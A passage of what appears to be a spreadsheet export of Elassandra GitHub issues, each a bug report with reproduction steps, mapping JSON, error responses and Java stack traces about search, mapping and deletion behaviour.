org.jboss.netty.channel.socket.nio.AbstractNioSelector.run(AbstractNioSelector.java:337) at org.jboss.netty.channel.socket.nio.AbstractNioWorker.run(AbstractNioWorker.java:89) at org.jboss.netty.channel.socket.nio.NioWorker.run(NioWorker.java:178) at org.jboss.netty.util.ThreadRenamingRunnable.run(ThreadRenamingRunnable.java:108) at org.jboss.netty.util.internal.DeadLockProofWorker$1.run(DeadLockProofWorker.java:42) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) at java.lang.Thread.run(Thread.java:745) Caused by: java.io.IOException: from is a reserved keyword at org.elassandra.cluster.InternalCassandraClusterService.updateTableSchema(InternalCassandraClusterService.java:1185) at org.elasticsearch.cluster.metadata.MetaDataMappingService$PutMappingExecutor.applyRequest(MetaDataMappingService.java:391) at org.elasticsearch.cluster.metadata.MetaDataMappingService$PutMappingExecutor.execute(MetaDataMappingService.java:280) at org.elasticsearch.cluster.service.InternalClusterService.runTasksForExecutor(InternalClusterService.java:540) at org.elasticsearch.cluster.service.InternalClusterService$UpdateTask.run(InternalClusterService.java:902) at org.elasticsearch.common.util.concurrent.PrioritizedEsThreadPoolExecutor$TieBreakingPrioritizedRunnable.runAndClean(PrioritizedEsThreadPoolExecutor.java:231) at org.elasticsearch.common.util.concurrent.PrioritizedEsThreadPoolExecutor$TieBreakingPrioritizedRunnable.run(PrioritizedEsThreadPoolExecutor.java:194)  3 common frames omitted Caused by: org.apache.cassandra.exceptions.ConfigurationException: from is a reserved keyword at org.elassandra.cluster.InternalCassandraClusterService.buildUDT(InternalCassandraClusterService.java:795) at org.elassandra.cluster.InternalCassandraClusterService.buildCql(InternalCassandraClusterService.java:744) at org.elassandra.cluster.InternalCassandraClusterService.buildUDT(InternalCassandraClusterService.java:772) at org.elassandra.cluster.InternalCassandraClusterService.buildCql(InternalCassandraClusterService.java:744) at org.elassandra.cluster.InternalCassandraClusterService.buildUDT(InternalCassandraClusterService.java:772) at org.elassandra.cluster.InternalCassandraClusterService.buildCql(InternalCassandraClusterService.java:744) at org.elassandra.cluster.InternalCassandraClusterService.updateTableSchema(InternalCassandraClusterService.java:1093)  9 common frames omitted  Interestingly, attempting the very same insert unchanged, works:  { "_index": "watcher", "_type": "watch", "_id": "test_watch_random", "_version": 1, "_shards": { "total": 1, "successful": 1, "failed": 0 }, "created": true }  and gets indexed correctly:  GET watcher/_search { "took": 5, "timed_out": false, "_shards": { "total": 1, "successful": 1, "failed": 0 }, "hits": { "total": 1, "max_score": 1, "hits": [ { "_index": "watcher", "_type": "watch", "_id": "test_watch_random", "_score": 1, "_source": { "input": "{\"search\":{\"request\":{\"index\":[],\"body\":{", "condition": "{\"script\":{\"script\":\"payload.hits.total &gt; 100\"}}", "transform": "{}", "id": "test_name" } } ] } }   Pure Object documents not searchable Attempting to create a mapping without an "enabled" field seems to fail harder - the above mapping/document without the "string" id field is accepted but returns no search results afterwards. Here's an adapted example to reproduce:  PUT watcher_fail { "mappings": { "watch": { "properties": { "condition": { "type":"object", "enabled": false }, "input": { "type":"object", "enabled": false }, "transform": { "type":"object", "enabled": false } } } } }  followed by a document creation attempt:  PUT watcher_fail/watch/this_doc_will_be_missing { "trigger": { "schedule": { "later": "every 5 minutes" } }, "input": { "search": { "request": { "index": [], "body": {} } } }, "condition": { "script": { "script": "payload.hits.total &gt; 100" } }, "transform": {}, "actions": { "email_admin": { "throttle_period": "15m", "email": { "to": "alarm@localhost", "from": "sentinl@localhost", "subject": "Sentinl Alarm", "priority": "high", "body": "Found {{payload.hits.total}} Events" } } } }  The above document should get accepted, but will never be available in search:  GET watcher_fail/_search </t>
  </si>
  <si>
    <t>https://github.com/strapdata/elassandra/issues/68</t>
  </si>
  <si>
    <t>ES Object Type stringified in search</t>
  </si>
  <si>
    <t xml:space="preserve">When inserting fields mapped as object type contents are returned as strings in search. In comparison my stock ES 2.x returns object fields as a valid JSON objects without escaping.  Steps to Reproduce * Create Mapping: json PUT watcher/watch/_mapping { "properties": { "uuid": { "type": "string", "index": "not_analyzed" }, "condition": { "type":"object", "enabled": false } } }  * Insert document with object fields json PUT watcher/watch/test_watch_random23 { "uuid": "test", "trigger": { "schedule": { "later": "every 1 minutes" } }, "condition": { "script": { "script": "payload.hits.total &gt; 1" } } }  * Query results, objects are returned as strings  GET watcher/_search { "took": 6, "timed_out": false, "_shards": { "total": 1, "successful": 1, "failed": 0 }, "hits": { "total": 1, "max_score": 1, "hits": [ { "_index": "watcher", "_type": "watch", "_id": "test_watch_random23", "_score": 1, "_source": { "condition": "{\"script\":{\"script\":\"payload.hits.total &gt; 1\"}}", "trigger": { "schedule": { "later": "every 1 minutes" } }, "uuid": "test" } } ] } } </t>
  </si>
  <si>
    <t>https://github.com/strapdata/elassandra/issues/70</t>
  </si>
  <si>
    <t>ES DELETE by index/type fails for time-series indices</t>
  </si>
  <si>
    <t>There seems to be a possible bug or difference in the way plan indices are handled (ie: test_index) vs. timeseries indices (ie: test-2017.01.01) particularly evident on DELETE actions:  Successful DELETE: test_index &lt;pre&gt; DELETE test_index PUT _template/test_template { "template": "test_index", "mappings": { "_default_": { "properties": { "attachment": { "type": "binary" }, "report": { "type": "boolean" }, "payload": { "type": "object", "enabled": false } } } } } PUT test_index/test_type/test12 { "@timestamp": "2016-12-27T19:14:00.012Z", "level": "INFO", "message": "test message", "action": "test_action", "payload": {}, "report": false } DELETE test_index/test_type/test12 &lt;/pre&gt;  Failed DELETE on index: test_index-2016.12.29 &lt;pre&gt; DELETE test_index* PUT _template/test_template { "template": "test_index-*", "mappings": { "_default_": { "properties": { "attachment": { "type": "binary" }, "report": { "type": "boolean" }, "payload": { "type": "object", "enabled": false } } } } } PUT test_index-2016.12.29/test_type/test12 { "@timestamp": "2016-12-27T19:14:00.012Z", "level": "INFO", "message": "test message", "action": "test_action", "payload": {}, "report": false } GET test_index-2016.12.29/_search DELETE test_index-2016.12.29/test_type/test12 &lt;/pre&gt; Which results in the following error: &lt;pre&gt; { "error": { "root_cause": [ { "type": "action_request_validation_exception", "reason": "Validation Failed: 1: test_index-2016.12.29.test_type table does not exists;" } ], "type": "action_request_validation_exception", "reason": "Validation Failed: 1: test_index-2016.12.29.test_type table does not exists;" }, "status": 400 } &lt;/pre&gt; Any suggestion as of what might be causing this?</t>
  </si>
  <si>
    <t>https://github.com/strapdata/elassandra/issues/163</t>
  </si>
  <si>
    <t>Invalid date mapping</t>
  </si>
  <si>
    <t>&lt;!-- GitHub is reserved for bug reports and feature requests. The best place to ask a general question is at the Elastic Discourse forums at https://discuss.elastic.co. If you are in fact posting a bug report or a feature request, please include one and only one of the below blocks in your new issue. Note that whether you're filing a bug report or a feature request, ensure that your submission is for an [OS that we support](https://www.elastic.co/support/matrix#show_os). Bug reports on an OS that we do not support or feature requests specific to an OS that we do not support will be closed. --&gt; &lt;!-- If you are filing a bug report, please remove the below feature request block and provide responses for all of the below items. --&gt; **Elasticsearch version**: 5.5.0 **Plugins installed**: [] **JVM version**: 8 **OS version**: **Description of the problem including expected versus actual behavior**: **Steps to reproduce**: 1. create table with date field  create table date_elassandra_test ( id int primary key, somedate date );  2. create mapping on it  PUT http://node:9200/myspace/date_elassandra_test/_mapping { "date_elassandra_test": { "properties": { "somedate": { "type": "date", "cql_collection": "singleton" } } } }  3. insert some data `insert into date_elassandra_test (id,somedate) values (1,'2018-02-03');` 4. check search result  POST http://node:9200/myspace/date_elassandra_test/_search  {  "_source": { "somedate": "-5877593-07-26T00:00:00.000Z" }  } As you see - somedate is somehow offseted date for ElasticSearch. But if TIMESTAMP cassandra type is used instead - all is well</t>
  </si>
  <si>
    <t>https://github.com/strapdata/elassandra/issues/282</t>
  </si>
  <si>
    <t>Unable to create geo_shape index</t>
  </si>
  <si>
    <t>Elassandra version: 6.2.3.13-14 jvm: openjdk version "1.8.0_212" OS: Linux 631697ed6903 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux docker image: strapdata/elassandra:latest Hello, i'm trying to create geo_shape index for field with following request: PUT http://localhost:9200/weather `{ "settings": { "keyspace":"weather" }, "mappings": { "weather_data" : { "_source": { "enabled": true }, "properties": { "geom": { "type":"geo_shape" } } } } }` got the error: `{ "error": { "root_cause": [ { "type": "mapper_parsing_exception", "reason": "Failed to execute query:null : Existing column [geom] type [text] mismatch with inferred type [list&lt;text&gt;]" } ], "type": "mapper_parsing_exception", "reason": "Failed to execute query:null : Existing column [geom] type [text] mismatch with inferred type [list&lt;text&gt;]", "caused_by": { "type": "configuration_exception", "reason": "Existing column [geom] type [text] mismatch with inferred type [list&lt;text&gt;]" } }, "status": 400 }` The weather table: `CREATE TABLE weather.weather_data ( id text, updated_at timestamp, alt int, created_at timestamp, es_options text, es_query text, geom text, predict tinyint, radius int, time timestamp, type tinyint, version bigint, weather text, x int, y int, PRIMARY KEY (id, updated_at) ) WITH CLUSTERING ORDER BY (updated_at DESC) AND bloom_filter_fp_chance = 0.01 AND caching = {'keys': 'ALL', 'rows_per_partition': 'NONE'} AND comment = '' AND compaction = {'class': 'org.apache.cassandra.db.compaction.SizeTieredCompactionStrategy', 'max_threshold': '32', 'min_threshold': '4'} AND compression = {'chunk_length_in_kb': '64', 'class': 'org.apache.cassandra.io.compress.LZ4Compressor'} AND crc_check_chance = 1.0 AND dclocal_read_repair_chance = 0.1 AND default_time_to_live = 0 AND gc_grace_seconds = 864000 AND max_index_interval = 2048 AND memtable_flush_period_in_ms = 0 AND min_index_interval = 128 AND read_repair_chance = 0.0 AND speculative_retry = '99PERCENTILE';` Why geo_shape index needs list&lt;text&gt; type? And if add 'cql_collection' parameter to index request: `{ "settings": { "keyspace":"weather" }, "mappings": { "weather_data" : { "_source": { "enabled": true }, "properties": { "geom": { "type":"geo_shape", "cql_collection":"singleton" } } } } }` I got the following error: `{ "error": { "root_cause": [ { "type": "mapper_parsing_exception", "reason": "Mapping definition for [geom] has unsupported parameters: [cql_collection : singleton]" } ], "type": "mapper_parsing_exception", "reason": "Failed to parse mapping [weather_data]: Mapping definition for [geom] has unsupported parameters: [cql_collection : singleton]", "caused_by": { "type": "mapper_parsing_exception", "reason": "Mapping definition for [geom] has unsupported parameters: [cql_collection : singleton]" } }, "status": 400 }` How can I create geo_shape index with field type 'text'?</t>
  </si>
  <si>
    <t>https://github.com/strapdata/elassandra/issues/295</t>
  </si>
  <si>
    <t>dots in object mapping ignored</t>
  </si>
  <si>
    <t>**Describe the feature**: Dots in object-field names are silently ignored **Elassandra version**: 6.2.3.15 **Plugins installed**: [] **JVM version** (`java -version`): OpenJDK Runtime Environment (build 1.8.0_212-8u212-b01-1~deb9u1-b01) OpenJDK 64-Bit Server VM (build 25.212-b01, mixed mode) **OS version** (`uname -a` if on a Unix-like system): Linux db1-dev 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64 GNU/Linux **Description of the problem including expected versus actual behavior**: **Steps to reproduce**: **1. Create empty index - e.g. testindex** **2. PUT /testindex/_doc/1** Request-Body: { "us.er" : "test", "postdate" : "2009-11-15T14:12:12", "message" : "Test123" } i get the following response document: { "_index": "testindex", "_type": "_doc", "_id": "1", "_version": 1, "result": "created", "_shards": { "total": 1, "successful": 1, "failed": 0 } } **3. GET on http://127.0.0.1:9200/testindex/_doc/1** { "_index": "testindex", "_type": "_doc", "_id": "1", "_version": 1, "found": true, "_source": { "postdate": "2009-11-15T14:12:12.000Z", "message": "Test123" } } the field with the dot in the name (us.er) is silently ignored.</t>
  </si>
  <si>
    <t>https://github.com/strapdata/elassandra/issues/298</t>
  </si>
  <si>
    <t>build_hash and build_date as Unknown after Installing ELS</t>
  </si>
  <si>
    <t>Hi, Post installation of elassandra i see output of curl -X GET http://localhost:9200/ having build_hash and build_date as Unknown Could you please fix the same? Thanks Ashish</t>
  </si>
  <si>
    <t>https://github.com/strapdata/elassandra/issues/323</t>
  </si>
  <si>
    <t>Elassandra mappings with type coercing aren't behaving the same as elasticsearch</t>
  </si>
  <si>
    <t>&lt;!-- Bug report --&gt; **Elassandra version**: 6.8.4.0 **JVM version** (`java -version`): docker image **OS version** (`uname -a` if on a Unix-like system): host system is OSx but I also tested it in GKE. **Description of the problem including expected versus actual behavior**: When using a mapping template, that enables type coercing, Elassandra doesn't behave the same as ElasticSearch. Instead it returns a 500 and an exception. **Steps to reproduce**: In both of these examples we'll be inserting a document that has an integer mapping. And in both cases the int field's value will be submitted as a string value.  Testing Elasticsearch 6.8  docker pull docker.elastic.co/elasticsearch/elasticsearch:6.8.6 docker run -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" docker.elastic.co/elasticsearch/elasticsearch:6.8.6 export HOST=localhost export INDEX=ents_type_site1 echo '{ "index_patterns": "ents_*", "mappings": { "_doc": { "properties": { "_created": { "type": "date" } }, "dynamic_templates": [ { "integer_fields": { "match": "int_*", "mapping": { "coerce": true, "type": "long" } } } ] } } }' | http PUT http://$HOST:9200/_template/ent_table_template { "acknowledged": true } echo '{"int__eventcnt":"1"}' | http POST http://$HOST:9200/$INDEX/_doc/a1bc=:1cd== { "_id": "a1bc=:1cd==", "_index": "ents_type_site1", "_primary_term": 1, "_seq_no": 0, "_shards": { "failed": 0, "successful": 1, "total": 2 }, "_type": "_doc", "_version": 1, "result": "created" }  * Note that elasticsearch handled the casting of the string to an int.  Testing elassandra 6.8  docker run -p 9200:9200 -p 9300:9300 --name node0 -d strapdata/elassandra:6.8.4.0 export INDEX=ents_type_site1 echo '{ "index_patterns": "ents_*", "mappings": { "_doc": { "properties": { "_created": { "type": "date" } }, "dynamic_templates": [ { "integer_fields": { "match": "int_*", "mapping": { "coerce": true, "type": "long" } } } ] } } }' | http PUT http://$HOST:9200/_template/ent_table_template { "acknowledged": true } echo '{"int__eventcnt":"1"}' | http POST http://$HOST:9200/$INDEX/_doc/a1bc=:1cd== { "error": { "reason": "java.lang.String cannot be cast to java.lang.Number", "root_cause": [ { "reason": "[172.17.0.2][172.17.0.2:9300][indices:data/write/bulk[s][p]]", "type": "remote_transport_exception" } ], "type": "class_cast_exception" }, "status": 500 }  **Please provide the following information**: * elassandra logs (logs/system.logs or /var/lib/cassandra/system.log)  2020-01-10 06:01:40,015 WARN [elasticsearch[172.17.0.2][http_server_worker][T#2]] org.elasticsearch.common.logging.DeprecationLogger.deprecated(DeprecationLogger.java:242) [types removal] The parameter include_type_name should be explicitly specified in put template requests to prepare for 7.0. In 7.0 include_type_name will default to 'false', and requests are expected to omit the type name in mapping definitions. 2020-01-10 06:01:42,691 INFO [elasticsearch[172.17.0.2][generic][T#3]] org.elassandra.shard.CassandraShardStateListener.afterIndexShardStarted(CassandraShardStateListener.java:69) shard [ents_type_site1][0] started 2020-01-10 06:01:42,994 ERROR [elasticsearch[172.17.0.2][write][T#1]] org.elassandra.cluster.QueryManager.upsertDocument(QueryManager.java:842) [java.lang.ClassCastException: java.lang.String cannot be cast to java.lang.Number].[ents_type_site1] failed to parse field _doc=int__eventcnt 2020-01-10 06:01:43,011 WARN [elasticsearch[172.17.0.2][write][T#1]] org.elasticsearch.rest.BytesRestResponse.build(BytesRestResponse.java:133) path: /ents_type_site1/_doc/a1bc=:1cd==, params: {index=ents_type_site1, id=a1bc=:1cd==, type=_doc} org.elasticsearch.transport.RemoteTransportException: [172.17.0.2][172.17.0.2:9300][indices:data/write/bulk[s][p]] Caused by: java.lang.ClassCastException: java.lang.String cannot be cast to java.lang.Number at org.elasticsearch.index.mapper.NumberFieldMapper$NumberType$7.cqlValue(NumberFieldMapper.java:870) at org.elasticsearch.index.mapper.NumberFieldMapper$NumberFieldType.cqlValue(NumberFieldMapper.java:1057) at org.elasticsearch.index.mapper.MappedFieldType.cqlValue(MappedFieldType.java:423) at org.elassandra.cluster.Serializer.serialize(Serializer.java:230) at org.elassandra.cluster.Serializer.serialize(Serializer.java:223) at org.elassandra.cluster.QueryManager.upsertDocument(QueryManager.java:840) at org.elassandra.cluster.QueryManager.insertDocument(QueryManager.java:694) at org.elasticsearch.action.bulk.TransportShardBulkAction.lambda$executeIndexRequestOnPrimary$3(TransportShardBulkAction.java:468) at org.elasticsearch.action.bulk.TransportShardBulkAction.executeOnPrimaryWhileHandlingMappingUpdates(TransportShardBulkAction.java:495) at org.elasticsearch.action.bulk.TransportShardBulkAction.executeIndexRequestOnPrimary(TransportShardBulkAction.java:464) at org.elasticsearch.action.bulk.TransportShardBulkAction.executeBulkItemRequest(TransportShardBulkAction.java:226) at org.elasticsearch.action.bulk.TransportShardBulkAction.performOnPrimary(TransportShardBulkAction.java:169) at org.elasticsearch.action.bulk.TransportShardBulkAction.performOnPrimary(TransportShardBulkAction.java:160) at org.elasticsearch.action.bulk.TransportShardBulkAction.shardOperationOnPrimary(TransportShardBulkAction.java:146) at org.elasticsearch.action.bulk.TransportShardBulkAction.shardOperationOnPrimary(TransportShardBulkAction.java:83) at org.elasticsearch.action.support.replication.TransportReplicationAction$PrimaryShardReference.perform(TransportReplicationAction.java:1088) at org.elasticsearch.action.support.replication.TransportReplicationAction$PrimaryShardReference.perform(TransportReplicationAction.java:1066) at org.elasticsearch.action.support.replication.ReplicationOperation.execute(ReplicationOperation.java:105) at org.elasticsearch.action.support.replication.TransportReplicationAction$AsyncPrimaryAction.runWithPrimaryShardReference(TransportReplicationAction.java:445) at org.elasticsearch.action.support.replication.TransportReplicationAction$AsyncPrimaryAction.doRun(TransportReplicationAction.java:387) at org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:37) at org.elasticsearch.action.support.replication.TransportReplicationAction$PrimaryOperationTransportHandler.messageReceived(TransportReplicationAction.java:327) at org.elasticsearch.action.support.replication.TransportReplicationAction$PrimaryOperationTransportHandler.messageReceived(TransportReplicationAction.java:314) at org.elasticsearch.transport.RequestHandlerRegistry.processMessageReceived(RequestHandlerRegistry.java:66) at org.elasticsearch.transport.TransportService$7.doRun(TransportService.java:696) at org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:751) at org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:37) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) at java.lang.Thread.run(Thread.java:748)  * elasticsearch cluster state (curl http://localhost:9200/_cluster/state) * cassandra schema (cqlsh&gt;DESC KEYSPACE &lt;your_keyspace&gt;) * cassandra gossip state (run: nodetool gossipinfo)</t>
  </si>
  <si>
    <t>https://github.com/strapdata/elassandra/issues/346</t>
  </si>
  <si>
    <t>Nested objects with inner hits query returns "extracted source isn't an object or an array"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Bug report --&gt; **Elassandra version**: Behavior is seen on official docker images [6.8.4.0](https://hub.docker.com/layers/strapdata/elassandra/6.8.4.0/images/sha256-1e004ecccfc506faf806464e4beed1815d3c973ee6d3bb4b88193084397d8491?context=explore) -&gt; [6.8.4.5](https://hub.docker.com/layers/strapdata/elassandra/6.8.4.5/images/sha256-1a7ff3e3c1ee0801f812aa321dfe4ae8a6f959c3ef47b0fbeaa3a4de695eff14?context=explore) **Plugins installed**: None **JVM version** (`java -version`): Docker image of 6.8.4.5 is running openjdk version "1.8.0_252" **OS version** (`uname -a` if on a Unix-like system): Running on a container on a host that is running 18.04.1-Ubuntu **Description of the problem including expected versus actual behavior**: I am moving from 6.2.3.28 to 6.8.4.5, and have noticed queries with inner hits on nested objects (as outlined in the steps below) are failing with the following error coming back:  { "error": { "root_cause": [ { "type": "illegal_state_exception", "reason": "extracted source isn't an object or an array" } ], "type": "search_phase_execution_exception", "reason": "all shards failed", "phase": "query", "grouped": true, "failed_shards": [ { "shard": 0, "index": "nested_data", "node": "5c622bfa-fef0-4dd0-b040-5a68a767beb5", "reason": { "type": "illegal_state_exception", "reason": "extracted source isn't an object or an array" } } ], "caused_by": { "type": "illegal_state_exception", "reason": "extracted source isn't an object or an array", "caused_by": { "type": "illegal_state_exception", "reason": "extracted source isn't an object or an array" } } }, "status": 500 }  **Reasons why I think this is a bug:** 1. When tested against [ES 6.8.4 docker image](https://hub.docker.com/layers/elasticsearch/library/elasticsearch/6.8.4/images/sha256-87538ba78df48470563796df1dbbf2e7bf407e97542830bfd395f912b15c07f0?context=explore) I do not see the same issue. 2. I do not see this issue on Elassandra 6.2.3.28, and assume there is backwards compatibility of query/mapping/docs on non major version releases **Other behaviors I noted:** Removing the inner_hits block of the query stops the issue, and so does turning off the source in the inner_hits block. However neither of these are desirable solutions Something else that seems to resolve the issue while I was triaging is removing `nested-object2` when inserting the data in step 2 below **Steps to reproduce**: 1. Create index at `nested_data` with the following mapping:  { "mappings": { "nested_data": { "properties": { "parent-nested": { "type": "nested", "properties": { "nested-object1": { "type": "nested", "properties": { "field1": { "type": "text" }, "field2": { "type": "text", "fields": { "keyword": { "type": "keyword", "ignore_above": 256 } } } } }, "nested-object2": { "type": "nested", "properties": { "field2": { "type": "text" } } } } } } } } }  2. Insert the following document in the above created index:  { "parent-nested": [ { "nested-object1": [ { "field1": "hello" } ] }, { "nested-object2": { } } ] }  3. Run the following query against the index:  { "query": { "bool": { "must": [ { "nested": { "path": "parent-nested.nested-object1", "inner_hits": { }, "query": { "bool": { "should": { "bool": { "must": { "match": { "parent-nested.nested-object1.field1": "hello" } } } } } } } } ] } } }  **Please provide the following information**: * elassandra logs:  elassandra | Elassandra started elassandra | 2020-06-04 17:51:31,748 WARN [elasticsearch[172.18.0.2][http_server_worker][T#2]] org.elasticsearch.common.logging.DeprecationLogger.deprecated(DeprecationLogger.java:242) [types removal] The parameter include_type_name should be explicitly specified in create index requests to prepare for 7.0. In 7.0 include_type_name will default to 'false', and requests are expected to omit the type name in mapping definitions. elassandra | 2020-06-04 17:51:33,174 INFO [elasticsearch[172.18.0.2][generic][T#2]] org.elassandra.shard.CassandraShardStateListener.afterIndexShardStarted(CassandraShardStateListener.java:69) shard [nested_data][0] started elassandra | 2020-06-04 17:51:46,971 WARN [elasticsearch[172.18.0.2][search][T#1]] org.elasticsearch.rest.BytesRestResponse.build(BytesRestResponse.java:133) path: /nested_data/_search, params: {index=nested_data} elassandra | org.elasticsearch.action.search.SearchPhaseExecutionException: all shards failed elassandra | at org.elasticsearch.action.search.AbstractSearchAsyncAction.onPhaseFailure(AbstractSearchAsyncAction.java:298) elassandra | at org.elasticsearch.action.search.AbstractSearchAsyncAction.executeNextPhase(AbstractSearchAsyncAction.java:135) elassandra | at org.elasticsearch.action.search.AbstractSearchAsyncAction.onPhaseDone(AbstractSearchAsyncAction.java:261) elassandra | at org.elasticsearch.action.search.InitialSearchPhase.onShardFailure(InitialSearchPhase.java:100) elassandra | at org.elasticsearch.action.search.InitialSearchPhase.access$100(InitialSearchPhase.java:48) elassandra | at org.elasticsearch.action.search.InitialSearchPhase$2.lambda$onFailure$1(InitialSearchPhase.java:220) elassandra | at org.elasticsearch.action.search.InitialSearchPhase.maybeFork(InitialSearchPhase.java:174) elassandra | at org.elasticsearch.action.search.InitialSearchPhase.access$000(InitialSearchPhase.java:48) elassandra | at org.elasticsearch.action.search.InitialSearchPhase$2.onFailure(InitialSearchPhase.java:220) elassandra | at org.elasticsearch.action.search.SearchExecutionStatsCollector.onFailure(SearchExecutionStatsCollector.java:73) elassandra | at org.elasticsearch.action.ActionListenerResponseHandler.handleException(ActionListenerResponseHandler.java:59) elassandra | at org.elasticsearch.action.search.SearchTransportService$ConnectionCountingHandler.handleException(SearchTransportService.java:463) elassandra | at org.elasticsearch.transport.TransportService$ContextRestoreResponseHandler.handleException(TransportService.java:1118) elassandra | at org.elasticsearch.transport.TransportService$DirectResponseChannel.processException(TransportService.java:1230) elassandra | at org.elasticsearch.transport.TransportService$DirectResponseChannel.sendResponse(TransportService.java:1204) elassandra | at org.elasticsearch.transport.TaskTransportChannel.sendResponse(TaskTransportChannel.java:60) elassandra | at org.elasticsearch.action.support.ChannelActionListener.onFailure(ChannelActionListener.java:56) elassandra | at org.elasticsearch.search.SearchService$2.onFailure(SearchService.java:368) elassandra | at org.elasticsearch.search.SearchService$2.onResponse(SearchService.java:362) elassandra | at org.elasticsearch.search.SearchService$2.onResponse(SearchService.java:356) elassandra | at org.elasticsearch.search.SearchService$4.doRun(SearchService.java:1114) elassandra | at org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:37) elassandra | at org.elasticsearch.common.util.concurrent.TimedRunnable.doRun(TimedRunnable.java:41) elassandra | at org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:751) elassandra | at org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:37) elassandra | at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) elassandra | at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) elassandra | at java.lang.Thread.run(Thread.java:748) elassandra | Caused by: org.elasticsearch.ElasticsearchException$1: extracted source isn't an object or an array elassandra | at org.elasticsearch.ElasticsearchException.guessRootCauses(ElasticsearchException.java:657) elassandra | at org.elasticsearch.action.search.AbstractSearchAsyncAction.executeNextPhase(AbstractSearchAsyncAction.java:133) elassandra |  26 common frames omitted elassandra | Caused by: java.lang.IllegalStateException: extracted source isn't an object or an array elassandra | at org.elasticsearch.search.fetch.FetchPhase.createNestedSearchHit(FetchPhase.java:340) elassandra | at org.elasticsearch.search.fetch.FetchPhase.execute(FetchPhase.java:166) elassandra | at org.elasticsearch.search.fetch.subphase.InnerHitsFetchSubPhase.hitsExecute(InnerHitsFetchSubPhase.java:69) elassandra | at org.elasticsearch.search.fetch.FetchPhase.execute(FetchPhase.java:184) elassandra | at org.elasticsearch.search.SearchService.executeFetchPhase(SearchService.java:424) elassandra | at org.elasticsearch.search.SearchService.executeQueryPhase(SearchService.java:404) elassandra | at org.elasticsearch.search.SearchService.access$100(SearchService.java:127) elassandra | at org.elasticsearch.search.SearchService$2.onResponse(SearchService.java:360) elassandra |  9 common frames omitted elassandra | 2020-06-04 18:06:06,393 WARN [elasticsearch[172.18.0.2][search][T#2]] org.elasticsearch.rest.BytesRestResponse.build(BytesRestResponse.java:133) path: /nested_data/_search, params: {index=nested_data} elassandra | org.elasticsearch.action.search.SearchPhaseExecutionException: all shards failed elassandra | at org.elasticsearch.action.search.AbstractSearchAsyncAction.onPhaseFailure(AbstractSearchAsyncAction.java:298) elassandra | at org.elasticsearch.action.search.AbstractSearchAsyncAction.executeNextPhase(AbstractSearchAsyncAction.java:135) elassandra | at org.elasticsearch.action.search.AbstractSearchAsyncAction.onPhaseDone(AbstractSearchAsyncAction.java:261) elassandra | at org.elasticsearch.action.search.InitialSearchPhase.onShardFailure(InitialSearchPhase.java:100) elassandra | at org.elasticsearch.action.search.InitialSearchPhase.access$100(InitialSearchPhase.java:48) elassandra | at org.elasticsearch.action.search.InitialSearchPhase$2.lambda$onFailure$1(InitialSearchPhase.java:220) elassandra | at org.elasticsearch.action.search.InitialSearchPhase.maybeFork(InitialSearchPhase.java:174) elassandra | at org.elasticsearch.action.search.InitialSearchPhase.access$000(InitialSearchPhase.java:48) elassandra | at org.elasticsearch.action.search.InitialSearchPhase$2.onFailure(InitialSearchPhase.java:220) elassandra | at org.elasticsearch.action.search.SearchExecutionStatsCollector.onFailure(SearchExecutionStatsCollector.java:73) elassandra | at org.elasticsearch.action.ActionListenerResponseHandler.handleException(ActionListenerResponseHandler.java:59) elassandra | at org.elasticsearch.action.search.SearchTransportService$ConnectionCountingHandler.handleException(SearchTransportService.java:463) elassandra | at org.elasticsearch.transport.TransportService$ContextRestoreResponseHandler.handleException(TransportService.java:1118) elassandra | at org.elasticsearch.transport.TransportService$DirectResponseChannel.processException(TransportService.java:1230) elassandra | at org.elasticsearch.transport.TransportService$DirectResponseChannel.sendResponse(TransportService.java:1204) elassandra | at org.elasticsearch.transport.TaskTransportChannel.sendResponse(TaskTransportChannel.java:60) elassandra | at org.elasticsearch.action.support.ChannelActionListener.onFailure(ChannelActionListener.java:56) elassandra | at org.elasticsearch.search.SearchService$2.onFailure(SearchService.java:368) elassandra | at org.elasticsearch.search.SearchService$2.onResponse(SearchService.java:362) elassandra | at org.elasticsearch.search.SearchService$2.onResponse(SearchService.java:356) elassandra | at org.elasticsearch.search.SearchService$4.doRun(SearchService.java:1114) elassandra | at org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:37) elassandra | at org.elasticsearch.common.util.concurrent.TimedRunnable.doRun(TimedRunnable.java:41) elassandra | at org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:751) elassandra | at org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:37) elassandra | at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) elassandra | at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) elassandra | at java.lang.Thread.run(Thread.java:748) elassandra | Caused by: org.elasticsearch.ElasticsearchException$1: extracted source isn't an object or an array elassandra | at org.elasticsearch.ElasticsearchException.guessRootCauses(ElasticsearchException.java:657) elassandra | at org.elasticsearch.action.search.AbstractSearchAsyncAction.executeNextPhase(AbstractSearchAsyncAction.java:133) elassandra |  26 common frames omitted elassandra | Caused by: java.lang.IllegalStateException: extracted source isn't an object or an array elassandra | at org.elasticsearch.search.fetch.FetchPhase.createNestedSearchHit(FetchPhase.java:340) elassandra | at org.elasticsearch.search.fetch.FetchPhase.execute(FetchPhase.java:166) 